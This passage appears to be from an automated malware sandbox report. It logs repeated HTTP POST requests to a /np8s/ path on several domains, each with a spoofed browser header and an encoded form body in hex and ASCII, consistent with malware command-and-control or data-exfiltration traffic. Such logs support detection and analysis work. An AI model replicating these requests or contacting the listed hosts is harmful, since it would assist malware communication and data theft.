U48h=aMQFUPioKxmhGFNkI5hYW_G6cjmrAOyRTV6sBAIbTPB08vR6rgT5Xs4Ow6glMHPX8BDmgo(jvXgIaWYH7B5lnRD_JAplPAcYWfHD8Kw-4EbJH0x5QleVGiHflyMT8qiTxwPHvmqmLE6rgMwyRKNNhsbnk1eE~yQdqASlcKk9fq0e7BT58hB5bAEHp6(Nm4gSdGDSqGt2M0e9MgQWGFW-QPCOrW0QIyMS7hgPLoawJPj6p9kNsZuyCzfuNqOW52MzJbETOQ4RmAChq9Ho5vXjnhm-SOrub8OuBygpkg44jpjGpfdSkogyc-FJh3RH9XacbthWOIcn4tAL7M3ZzKN-03Rtx-n4CsPBQux8HUskAu8xx5P1ABlUNfVmJfPyWFy5i-wjazYxUbnY9Z~rQg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.sekolahkejepang.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.sekolahkejepang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sekolahkejepang.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 61 4d 51 46 55 4e 32 45 46 6c 65 43 43 56 42 48 4c 4c 51 62 65 73 4f 30 65 54 69 6f 45 38 32 30 57 6e 44 4c 46 42 35 70 42 5f 35 69 76 72 77 61 68 44 69 2d 58 75 67 6e 39 70 45 68 47 48 7a 55 38 42 61 78 67 6f 4c 6a 39 58 49 59 64 33 4a 69 37 69 52 36 78 78 44 50 49 41 6f 35 4c 43 6f 35 57 66 54 68 38 4b 49 75 34 55 33 4a 47 58 5a 35 48 32 32 65 5a 53 48 56 73 53 63 50 78 4b 75 64 78 30 62 66 76 6e 57 6d 4b 30 32 72 6a 74 41 78 41 35 56 43 6f 63 62 6d 32 6c 65 6e 33 53 73 76 71 41 57 48 63 50 63 39 66 38 4d 65 36 53 72 35 35 53 5a 2d 56 51 45 43 74 36 28 4d 69 34 38 35 64 47 66 6b 71 45 42 6d 4d 47 43 39 4d 51 51 58 58 6d 32 4d 56 65 44 57 34 47 6f 33 49 79 41 72 37 7a 45 58 4c 70 33 6a 65 76 50 72 6c 38 4a 6f 73 66 4f 55 45 54 65 6e 47 4b 4f 64 35 32 4d 54 4a 62 45 74 4f 51 49 52 6d 48 65 68 6f 62 44 6f 7e 4f 58 67 37 52 6d 5f 63 75 72 4d 56 63 43 65 42 79 34 35 6b 6b 31 66 6a 34 72 47 6f 36 35 53 30 4a 67 78 4a 75 46 4c 76 58 52 61 6f 6e 61 66 62 74 68 34 4f 4e 67 4e 34 65 45 4c 35 5a 50 5a 28 49 56 2d 79 48 52 74 74 4f 6e 32 4e 4d 44 52 51 75 70 34 48 56 77 61 44 63 51 78 32 71 48 31 48 6a 64 55 4f 76 56 6d 41 5f 4f 45 59 57 58 77 75 73 6f 48 52 54 30 75 57 76 79 41 7a 35 72 63 44 6b 73 2d 42 77 57 35 7a 6a 54 35 72 78 76 6b 4f 50 58 4c 74 5f 74 6f 5a 4f 5a 47 7a 76 72 32 45 30 39 46 65 49 68 6f 4c 4b 66 53 44 73 32 69 48 6f 53 55 62 37 76 72 44 34 64 49 34 6b 45 5a 70 70 48 6e 4a 36 72 61 70 75 34 62 48 68 49 73 6c 58 6e 56 31 6e 4b 4a 42 38 67 4e 39 79 6e 67 42 73 49 68 54 6f 5a 54 6a 72 4a 75 77 7a 68 5f 4f 
69 31 61 79 48 6c 32 6b 48 46 73 71 62 43 63 34 6e 35 36 71 4a 48 34 42 33 71 6b 36 67 42 65 53 5f 77 61 7e 5f 6b 6c 54 5f 34 41 35 4e 28 75 41 30 67 79 6b 65 6e 68 6b 36 67 2d 6f 78 66 61 66 49 79 62 6d 6a 64 73 49 69 4a 73 51 52 62 67 6c 53 66 4b 37 6f 68 4f 39 6a 64 6e 73 68 48 43 50 34 4a 74 4e 31 50 4e 75 71 4e 65 52 2d 4f 36 31 66 7a 43 70 62 58 2d 47 42 7e 69 45 63 61 43 45 5f 31 36 41 39 75 52 31 52 33 6c 57 7a 61 36 6f 54 32 74 46 61 34 72 75 34 79 52 58 53 49 52 33 6c 4d 32 49 35 56 63 59 67 63 79 50 65 78 63 44 55 6a 38 56 7a 65 46 61 32 48 4a 47 4c 56 57 43 72 68 75 57 34 59 56 4c 75 4f 47 6e 62 49 7a 33 2d 28 39 35 66 6a 65 6c 72 46 62 32 67 41 41 78 77 50 67 5a 73 65 76 71 43 30 52 46 6b 64 74 79 42 72 76 4d 6a 65 4f 39 5f 49 42 69 57 73 67 51 55 67 37 42 77 43 53 58 69 32 65 64 59 62 41 5a 50 63 48 47 69 50 48 67 6d 78 34 77 32 5a 58 59 78 6a 4b 79 38 4f 61 6a 57 4e 67 4e 53 47 5f 63 31 44 57 4c 63 54 55 54 6b 51 6a 49 53 69 75 78 75 49 77 75 72 33 56 6c 2d 6d 71 51 56 78 75 50 47 75 57 58 72
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 67 6e 66 51 70 74 36 58 4f 66 77 74 6c 4c 68 48 70 55 66 50 63 5a 31 53 4e 62 49 47 58 75 4d 4f 47 70 48 5a 43 53 70 70 7e 59 79 33 28 6e 68 66 7e 45 34 69 55 46 54 54 76 35 78 33 28 69 6c 54 72 32 51 55 6e 66 50 44 70 44 47 5a 6b 35 30 34 31 69 6f 45 42 52 4b 66 45 31 38 45 6e 44 79 4f 6f 63 6d 33 41 6b 33 41 64 72 52 47 75 70 5a 61 4c 53 39 46 62 45 42 69 50 45 76 62 76 53 36 63 Data Ascii: U48h=gnfQpt6XOfwtlLhHpUfPcZ1SNbIGXuMOGpHZCSpp~Yy3(nhf~E4iUFTTv5x3(ilTr2QUnfPDpDGZk5041ioEBRKfE18EnDyOocm3Ak3AdrRGupZaLS9FbEBiPEvbvS6c
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.68chengxinle.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.68chengxinle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.68chengxinle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 37 64 39 33 45 51 68 55 78 32 6d 4c 57 63 39 4b 5a 76 50 4b 4a 74 43 64 36 43 65 71 4d 54 35 6e 62 65 53 4d 4d 6d 7e 36 61 30 77 30 34 6f 37 71 4a 55 75 32 43 72 4f 2d 62 6c 39 52 57 47 56 76 78 4e 58 64 4e 78 7e 72 79 48 56 73 77 42 68 5a 52 76 42 53 45 4a 30 4c 6a 6c 45 53 6d 4c 67 5a 49 54 78 66 73 76 49 76 59 4c 4c 73 39 4e 35 4a 45 78 5a 69 58 6f 70 4b 6b 76 7a 4a 42 37 32 5a 59 66 7a 63 4b 39 66 39 74 31 38 75 4a 58 68 68 57 7a 79 44 42 4b 7e 42 57 49 6e 79 68 6f 73 36 49 52 56 34 75 34 43 63 36 45 58 48 6b 45 4b 54 50 45 31 67 51 33 4d 72 6f 41 50 37 6d 49 41 6e 44 79 38 77 46 35 6d 56 36 79 53 31 7a 67 4a 4e 30 63 42 67 54 38 31 4d 30 34 6f 42 39 62 38 50 53 7a 73 71 41 47 48 66 46 49 41 6c 4d 63 7a 4c 4b 36 33 70 30 69 61 6f 61 67 46 7a 31 41 4a 67 38 42 57 2d 4e 59 66 4a 6b 74 67 65 6f 57 79 72 78 66 6f 45 7a 33 6d 76 61 5f 32 78 31 74 47 6b 34 45 4b 66 54 47 70 39 6d 5a 75 2d 69 57 4d 76 7e 66 76 35 37 77 6a 31 73 66 53 53 68 6f 7e 58 30 4b 45 79 43 74 50 50 43 62 57 33 37 75 64 77 4e 39 65 6d 46 52 4b 52 6f 42 64 38 28 6d 37 45 49 6b 63 6f 58 64 63 6f 46 79 67 42 28 77 51 57 62 43 7e 4d 30 55 4d 52 31 35 7e 35 32 56 72 67 6f 45 5a 4f 34 4c 51 71 47 44 77 6c 52 46 63 32 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
U48h=7d93EQhUx2mLWc9KZvPKJtCd6CeqMT5nbeSMMm~6a0w04o7qJUu2CrO-bl9RWGVvxNXdNx~ryHVswBhZRvBSEJ0LjlESmLgZITxfsvIvYLLs9N5JExZiXopKkvzJB72ZYfzcK9f9t18uJXhhWzyDBK~BWInyhos6IRV4u4Cc6EXHkEKTPE1gQ3MroAP7mIAnDy8wF5mV6yS1zgJN0cBgT81M04oB9b8PSzsqAGHfFIAlMczLK63p0iaoagFz1AJg8BW-NYfJktgeoWyrxfoEz3mva_2x1tGk4EKfTGp9mZu-iWMv~fv57wj1sfSSho~X0KEyCtPPCbW37udwN9emFRKRoBd8(m7EIkcoXdcoFygB(wQWbC~M0UMR15~52VrgoEZO4LQqGDwlRFc2aw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.68chengxinle.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.68chengxinle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.68chengxinle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 37 64 39 33 45 56 68 38 75 57 4b 57 61 73 35 70 65 64 76 6b 52 4e 53 6c 34 79 4b 6c 4a 52 73 6e 52 4d 71 2d 53 54 43 4c 62 33 73 75 28 59 50 4c 44 31 6e 78 43 70 57 58 54 33 4a 56 53 6d 5a 6f 78 4e 66 43 4e 78 36 72 7a 48 74 38 33 67 78 5f 52 4e 35 52 48 70 31 2d 69 6c 45 62 73 70 55 30 49 54 6c 48 73 76 51 5f 59 62 66 73 28 6f 6c 4a 4e 51 5a 70 49 59 70 45 34 2d 65 4b 63 72 36 75 59 66 4c 55 4b 5f 4c 39 74 46 34 75 47 58 52 69 51 77 71 45 4d 36 7e 4f 44 34 6e 5a 34 34 67 49 49 52 52 61 75 39 36 63 36 79 76 48 6c 58 53 54 4a 31 31 6a 61 6e 4d 75 69 67 4f 6b 69 49 63 32 44 79 77 38 46 34 6a 69 39 43 57 31 79 51 4a 4f 34 71 42 6f 43 39 31 68 32 36 49 32 39 61 42 72 52 6e 4d 35 41 44 58 5f 56 65 74 52 43 61 65 73 4b 34 61 45 35 69 61 73 4f 77 45 76 31 41 49 66 38 42 58 64 4e 62 33 4a 6b 71 45 65 70 7a 7e 72 68 75 6f 4c 38 33 6d 71 51 66 33 79 34 4e 44 58 34 45 54 45 54 44 73 67 6d 71 69 2d 68 7a 77 76 34 75 76 2d 30 51 69 2d 69 5f 53 58 75 49 7e 75 30 4b 46 52 43 73 50 6c 43 72 36 33 36 39 46 77 4e 62 4b 6d 48 68 4b 52 6e 68 64 79 30 47 33 79 49 6c 30 73 58 63 41 43 46 42 4d 42 38 6a 6f 57 66 57 69 4d 34 45 4d 52 36 5a 28 64 6c 46 6d 66 71 79 78 4c 7e 70 30 6d 46 6e 64 41 53 6d 39 4f 4b 41 69 69 39 43 6a 49 67 32 57 48 79 64 7e 73 6b 31 7a 39 34 61 31 41 7a 48 73 4f 74 32 34 43 6f 58 46 4d 77 67 49 37 48 51 6c 33 6e 54 32 47 63 4f 62 77 4c 62 6b 41 66 2d 64 65 6f 77 53 30 70 5a 61 57 73 7a 7a 75 68 55 70 52 65 5a 4a 44 76 7a 56 5f 71 59 50 61 35 4f 6a 6b 49 72 54 6a 58 31 74 34 76 78 73 32 62 6a 44 6b 70 4a 69 62 70 30 48 56 
6c 33 72 62 70 77 4f 62 38 4d 76 49 57 6c 73 4c 69 62 70 70 4d 70 73 55 5a 50 61 32 28 5a 73 68 41 73 53 43 38 6b 31 46 61 5f 33 66 4b 71 44 45 44 66 4f 72 43 54 75 73 71 48 53 35 35 32 4b 72 51 56 64 4e 34 2d 34 36 64 37 32 36 42 50 43 34 4e 42 62 37 6b 51 48 50 6d 47 67 52 74 58 79 36 61 47 6c 6d 75 47 7a 33 42 6f 67 4e 34 70 4c 57 67 47 6b 7a 62 78 46 34 51 76 52 57 6a 45 4d 55 44 6d 6a 75 6f 6f 32 4f 56 4b 33 58 5a 30 73 56 74 76 63 51 4f 6f 73 4a 64 68 68 38 78 2d 5a 34 48 65 69 76 73 5f 4a 43 50 71 51 53 65 4f 71 4a 67 34 61 73 69 2d 34 74 41 56 61 75 4d 39 77 61 79 57 42 63 55 52 51 63 77 69 72 35 54 4e 7e 4f 32 67 49 35 59 7a 72 30 39 58 28 65 6c 4d 49 44 61 38 31 31 68 72 5a 57 4f 52 59 6e 7a 31 66 64 45 70 73 50 52 6b 66 69 47 74 4b 54 77 6e 47 50 48 69 30 51 4c 70 55 51 39 54 6d 46 6d 6c 34 6d 6f 65 57 67 6a 69 45 69 66 34 5a 68 44 64 6c 36 44 46 6f 51 62 63 57 79 4c 4d 34 38 39 70 54 34 4c 63 32 6c 43 5a 50 78 6f 64 28 6d 61 5f 6a 72 78 4d 36 30 54 6b 31 36 55 78 4c 4b 67 66 58 31 69 4c 56 5f 31
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.topings33.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.topings33.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.topings33.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 78 33 62 6f 4f 32 30 54 63 6b 62 46 62 45 58 79 63 37 47 52 61 54 64 70 54 53 62 71 63 39 4c 5a 48 34 58 45 31 76 79 51 34 6a 76 47 62 61 4d 2d 38 79 31 62 64 76 59 67 48 50 49 74 35 69 6b 75 55 4e 54 53 31 5a 78 49 50 46 34 48 39 54 56 6b 69 36 6c 49 52 36 79 70 7e 4b 61 69 73 52 73 67 39 65 47 39 34 30 51 4b 7a 46 44 61 47 63 44 73 53 70 33 42 73 4d 39 36 77 37 33 5a 42 71 33 4a 79 38 72 71 32 46 79 30 4f 71 79 41 31 52 79 4d 39 57 35 77 73 55 28 56 44 52 4a 64 41 73 28 6d 62 64 69 63 28 64 70 53 35 56 47 42 63 39 41 2d 55 6f 6f 35 45 58 4f 57 68 33 70 59 63 71 67 70 72 6f 4f 38 38 2d 45 56 50 37 7a 4c 41 47 31 46 66 63 37 56 78 4a 63 50 75 35 38 63 72 49 77 77 46 68 77 39 55 6b 35 62 41 7a 76 4f 70 53 56 38 41 44 4f 5f 43 33 51 43 59 36 37 33 34 6b 70 54 57 73 56 2d 31 4a 66 34 4c 49 79 4f 69 64 79 77 59 46 72 38 44 6f 66 4d 4f 4e 71 74 69 41 37 5a 76 4a 52 30 62 78 76 62 6a 77 4c 6c 64 6c 61 6d 50 31 5a 6d 70 65 55 5f 52 47 4e 64 56 38 34 4f 34 78 5a 4c 6d 6c 59 31 68 32 4d 59 6c 63 71 41 73 70 4c 76 76 7a 4d 38 31 51 34 46 64 35 43 4b 54 4a 75 38 50 38 54 74 32 78 4c 50 4a 47 42 58 4d 36 52 47 6c 68 6b 64 41 5a 59 39 28 68 68 36 49 56 32 6d 38 69 61 4f 30 5a 32 6d 66 53 7e 68 6b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
U48h=x3boO20TckbFbEXyc7GRaTdpTSbqc9LZH4XE1vyQ4jvGbaM-8y1bdvYgHPIt5ikuUNTS1ZxIPF4H9TVki6lIR6yp~KaisRsg9eG940QKzFDaGcDsSp3BsM96w73ZBq3Jy8rq2Fy0OqyA1RyM9W5wsU(VDRJdAs(mbdic(dpS5VGBc9A-Uoo5EXOWh3pYcqgproO88-EVP7zLAG1Ffc7VxJcPu58crIwwFhw9Uk5bAzvOpSV8ADO_C3QCY6734kpTWsV-1Jf4LIyOidywYFr8DofMONqtiA7ZvJR0bxvbjwLldlamP1ZmpeU_RGNdV84O4xZLmlY1h2MYlcqAspLvvzM81Q4Fd5CKTJu8P8Tt2xLPJGBXM6RGlhkdAZY9(hh6IV2m8iaO0Z2mfS~hkQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.topings33.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.topings33.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.topings33.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 78 33 62 6f 4f 79 31 49 59 58 66 6d 58 30 61 55 52 70 32 4e 43 7a 74 72 66 43 66 6c 5a 38 57 48 4e 70 6e 36 78 74 37 6d 37 6a 6e 6d 52 4b 51 66 33 54 68 44 64 76 6f 5a 63 74 39 71 75 79 67 74 55 4e 72 38 31 5a 6c 49 4f 47 49 58 36 30 5a 65 69 5a 4e 50 63 36 79 56 39 4b 61 42 36 53 70 41 39 66 58 53 34 30 59 61 30 31 76 61 45 2d 4c 73 55 6f 33 4b 7a 63 39 38 76 4c 48 64 46 71 7a 2d 79 38 79 70 32 41 53 30 4f 61 7e 41 30 78 43 54 37 56 52 7a 32 30 28 51 47 52 4a 45 4f 38 79 42 62 63 57 79 28 63 35 53 36 6d 79 42 64 73 67 2d 45 50 63 36 4c 33 4f 54 77 6e 70 76 50 36 6b 34 72 6f 53 67 38 5f 77 76 4d 4b 48 4c 43 32 31 2d 61 50 72 33 37 36 45 69 6f 36 68 38 72 49 39 65 45 77 73 6c 55 67 78 33 51 77 32 6d 33 41 4e 47 41 42 43 46 4f 33 51 47 51 61 36 31 34 6b 6f 6b 57 73 56 41 31 4e 62 34 4c 4c 69 4f 34 2d 4b 77 59 67 4c 5f 65 34 66 4a 48 74 71 6c 39 77 28 70 76 4a 59 35 62 78 47 41 6a 6e 7a 6c 63 41 6d 6d 49 45 5a 6c 39 75 55 31 4d 57 4e 49 50 4d 34 5f 34 78 5a 6c 6d 6b 5a 75 67 46 34 59 6b 4e 71 41 76 50 28 76 71 44 4d 38 37 77 34 48 53 5a 50 52 54 4a 6e 30 50 39 69 50 32 47 37 50 4a 58 68 58 4d 62 52 47 6d 52 6b 64 5a 4a 5a 2d 36 54 35 32 4e 6b 37 53 79 55 79 5a 36 2d 48 49 4c 54 66 32 33 76 42 59 44 69 4c 49 6f 47 77 48 45 77 39 59 4e 63 47 64 50 44 72 2d 70 6f 47 42 47 62 4b 58 6f 77 75 66 61 47 66 70 57 68 72 69 59 44 6f 64 4d 70 42 77 6a 57 79 6c 44 4a 72 4f 76 6f 71 4c 43 76 73 39 55 49 77 38 67 75 36 75 41 59 4b 64 55 59 41 48 53 51 62 4e 56 52 28 62 5a 30 39 50 4e 56 75 48 73 30 39 7a 44 38 57 63 44 7a 5a 52 72 4e 31 47 55 6d 47 
4f 4e 77 4d 69 54 6a 33 35 63 45 71 6f 67 4b 68 39 58 62 72 62 45 4f 6e 46 38 37 46 59 77 67 43 4d 37 69 62 5a 66 4b 48 44 4c 6f 73 7a 6b 57 69 44 43 62 33 66 42 4e 41 42 28 44 36 4a 69 37 6a 46 57 5f 44 61 71 2d 70 6d 54 68 61 31 66 66 62 32 44 51 32 38 71 44 39 6a 57 49 77 6e 7a 75 6e 49 70 7a 6c 58 38 48 71 67 63 77 39 52 4a 67 4b 6a 52 70 64 72 71 61 52 66 58 50 28 4b 64 64 5a 2d 52 4f 79 49 30 71 61 4b 70 49 65 6e 7e 2d 49 48 78 42 4f 5f 35 46 7e 48 41 6c 49 59 41 37 54 32 79 75 5a 76 35 71 63 71 6e 6c 33 76 5a 78 43 6e 72 33 33 67 4c 4a 61 46 43 52 48 4b 53 53 41 46 51 79 39 33 42 33 57 34 57 31 51 41 69 5a 70 56 34 56 54 62 79 55 33 73 73 64 6d 66 6f 58 55 48 77 76 33 56 35 41 65 76 59 4f 63 5f 4b 32 53 79 67 76 6d 77 50 48 4c 6a 56 62 50 55 42 55 67 49 67 36 30 74 34 59 77 68 56 6c 46 37 6b 47 30 33 74 34 46 43 78 43 38 43 47 6f 53 37 4d 70 79 46 4b 6d 39 4f 32 4c 36 51 46 58 52 4b 37 6d 4f 4f 34 47 76 34 68 45 74 76 67 5f 53 56 35 35 51 34 4c 72 32 63 73 36 35 70 7e 45 4d 51 44 4e 73 57 51 4e 32 4d
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 47 62 6c 68 68 35 74 66 6c 78 4d 32 61 6a 63 4c 58 77 50 6e 6d 7e 53 68 5a 4c 48 61 4c 4e 48 63 72 64 51 36 30 59 2d 6a 32 61 76 6a 32 65 4e 6c 33 43 39 56 54 6a 65 65 58 61 4b 32 4f 78 6b 28 5a 7e 32 6d 68 36 6d 55 6d 52 70 43 79 76 78 71 36 69 72 56 69 4e 57 4b 69 36 38 4f 4a 44 45 6c 53 71 67 28 58 37 50 71 54 35 5f 62 64 44 4c 6a 61 46 6b 50 49 35 33 37 4f 52 54 57 4b 53 6a 72 4f 4a 37 71 70 56 43 61 6d 52 39 77 66 62 58 6c 43 69 65 54 2d 50 6f 65 43 71 66 7a 57 35 4c 39 30 69 76 65 73 7a 44 43 78 64 47 59 64 4a 32 50 57 42 47 70 5a 4e 66 6e 55 32 33 61 76 65 46 6a 7a 42 50 48 30 78 66 47 34 53 7a 56 32 52 79 72 66 6d 43 31 37 68 6f 6d 36 4a 49 59 64 31 33 42 4d 33 49 78 77 45 41 58 70 48 57 67 50 74 6c 77 65 75 42 70 4f 4e 6d 38 62 5a 6c 58 52 79 45 71 64 54 46 49 52 65 35 67 4c 58 73 50 33 39 52 73 49 6a 44 74 4a 68 48 4c 50 48 55 28 52 68 4d 55 75 59 72 35 67 6d 74 6f 44 48 7a 51 43 50 52 4b 55 36 35 4d 56 67 4a 75 63 6b 6c 4d 6c 54 6b 64 66 37 4a 6c 45 62 52 6a 78 44 6f 7e 56 35 70 77 43 45 34 64 38 32 4c 50 6d 37 63 72 34 4a 69 47 57 78 56 6b 46 37 46 41 5f 53 54 28 55 28 50 36 78 4d 54 73 35 43 4a 49 75 58 33 67 4d 73 71 70 56 41 4a 31 42 72 76 30 34 7e 4d 41 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
U48h=zJcaCGblhh5tflxM2ajcLXwPnm~ShZLHaLNHcrdQ60Y-j2avj2eNl3C9VTjeeXaK2Oxk(Z~2mh6mUmRpCyvxq6irViNWKi68OJDElSqg(X7PqT5_bdDLjaFkPI537ORTWKSjrOJ7qpVCamR9wfbXlCieT-PoeCqfzW5L90iveszDCxdGYdJ2PWBGpZNfnU23aveFjzBPH0xfG4SzV2RyrfmC17hom6JIYd13BM3IxwEAXpHWgPtlweuBpONm8bZlXRyEqdTFIRe5gLXsP39RsIjDtJhHLPHU(RhMUuYr5gmtoDHzQCPRKU65MVgJucklMlTkdf7JlEbRjxDo~V5pwCE4d82LPm7cr4JiGWxVkF7FA_ST(U(P6xMTs5CJIuX3gMsqpVAJ1Brv04~MAw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 43 62 4a 73 77 46 30 52 56 39 6e 79 73 6e 49 54 58 41 4e 6c 57 72 44 28 74 61 64 64 36 63 2d 45 50 56 68 37 78 31 5f 6e 47 57 4f 6e 33 4b 56 6c 32 54 32 64 41 48 42 4a 6e 58 34 32 4f 70 47 28 5a 79 32 6e 69 4b 74 58 46 70 50 46 51 58 79 74 61 69 54 55 69 4e 44 4f 6a 6d 42 4f 4a 47 30 6c 57 79 77 28 6e 48 50 34 68 78 5f 64 65 71 46 70 61 46 59 48 6f 4a 72 6c 2d 64 6b 57 4f 47 72 72 50 31 37 71 5a 4a 43 61 46 5a 38 6e 4d 7a 55 6f 79 69 62 57 2d 50 78 4c 53 76 75 7a 57 39 74 39 32 47 76 65 65 58 44 42 42 39 47 64 71 56 70 58 32 42 4a 37 70 4e 59 71 30 36 71 61 76 79 4a 6a 33 78 35 53 52 78 66 47 49 53 79 53 6b 77 53 36 34 79 52 36 62 56 50 6d 36 46 68 59 73 70 52 42 4e 4b 38 68 77 70 6c 59 71 7e 65 67 4d 42 44 6a 75 75 46 78 2d 4e 32 38 62 5a 46 58 52 79 6d 71 64 6a 46 49 53 75 35 68 70 66 73 4a 57 39 53 6f 6f 6a 4d 6d 70 68 66 46 76 4c 47 28 52 59 4a 55 75 78 6a 35 33 47 74 70 69 33 7a 58 32 62 53 52 6b 36 46 54 46 68 64 33 73 6b 71 4d 6c 54 38 64 65 36 4d 6c 33 76 52 67 45 37 6f 35 77 74 70 79 79 45 34 42 73 32 4a 57 32 33 79 72 37 35 6d 47 58 41 67 78 6d 58 46 5a 4e 61 54 78 56 28 50 35 42 4d 54 6a 5a 43 62 47 73 71 76 68 5f 30 5f 73 6e 41 6f 28 67 71 41 77 63 58 32 43 5a 78 63 43 2d 46 66 49 47 32 72 46 34 64 64 32 6a 76 46 4c 73 41 65 47 35 65 5f 59 71 49 5f 72 42 72 32 66 66 6b 6f 58 50 78 55 4d 63 46 55 6a 62 37 2d 55 76 5a 75 4e 47 55 62 4a 58 28 52 55 65 6b 72 6b 4a 68 65 50 66 61 78 7a 65 38 6c 7a 32 4a 46 62 4e 31 45 62 6c 77 68 49 74 66 4b 38 70 73 56 38 73 69 64 79 51 4b 58 6f 69 6c 
4d 39 4d 69 50 70 4a 47 57 69 52 39 38 67 6a 73 64 56 35 28 65 62 62 58 75 44 51 30 2d 63 42 43 2d 71 52 55 57 62 4e 67 32 51 63 51 44 68 46 64 6e 49 72 6d 58 6e 4e 73 38 35 49 48 44 74 46 4c 31 56 6e 4b 32 49 62 6a 47 77 64 6a 50 4a 2d 31 2d 31 6a 72 77 63 47 7e 45 49 59 28 74 30 33 46 4b 68 32 45 39 42 2d 6f 77 72 57 35 52 65 74 69 76 59 4a 76 6e 58 77 72 4a 64 35 72 48 46 64 75 46 48 50 66 49 6f 33 48 48 4d 64 7a 30 78 67 79 49 67 34 32 33 55 49 66 33 48 2d 72 41 68 62 6f 59 78 30 71 65 53 58 36 5f 41 33 49 2d 77 73 70 74 4c 42 41 63 4a 64 33 38 56 77 63 70 50 47 55 6c 6b 58 51 6f 43 46 4c 33 39 54 6a 66 70 45 6e 53 45 4b 73 5f 48 49 47 61 44 5a 4d 39 78 37 66 4c 58 5f 43 4f 69 6a 56 6b 78 65 7e 4b 4a 6c 35 52 6e 36 63 4e 4b 4e 62 41 61 38 66 63 47 74 39 56 42 75 68 50 6b 4c 30 64 72 6d 4b 4f 7a 67 69 58 56 42 56 50 41 34 72 42 39 42 30 33 73 47 47 5a 36 52 6e 74 47 52 6a 53 51 6d 39 74 4b 71 65 6f 38 63 37 41 64 34 4f 7a 5a 4d 58 50 59 36 7a 77 6f 2d 57 78 69 6e 56 55 37 69 6d 53 32 49 47 4c 35 47 62 55
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 35 37 38 43 41 37 64 6f 71 73 77 42 30 65 58 78 49 41 71 33 6c 4d 56 78 56 71 76 4e 30 54 4c 59 33 6d 65 37 7a 36 42 34 6d 46 4a 4c 68 34 50 2d 4a 68 45 6e 37 35 7e 32 5a 75 6a 48 67 38 61 4b 63 59 67 32 44 37 55 41 57 5a 74 70 31 79 56 53 65 68 62 54 47 71 46 36 6a 63 6c 79 37 72 66 33 78 6a 45 59 33 51 71 30 65 61 49 59 31 68 43 71 64 4f 67 5f 62 52 71 32 63 54 41 4f 4c 63 58 66 6a 79 70 56 68 45 33 6b 6a 71 75 51 42 72 36 39 69 56 4f 4e 66 49 69 35 46 70 69 33 50 65 37 7a 48 34 53 32 33 33 77 48 4d 2d 78 55 72 47 4c 2d 72 48 45 74 77 43 53 4a 56 67 62 56 62 5f 59 42 74 65 57 50 44 37 6d 46 4f 4a 73 6f 4f 64 6c 76 58 68 31 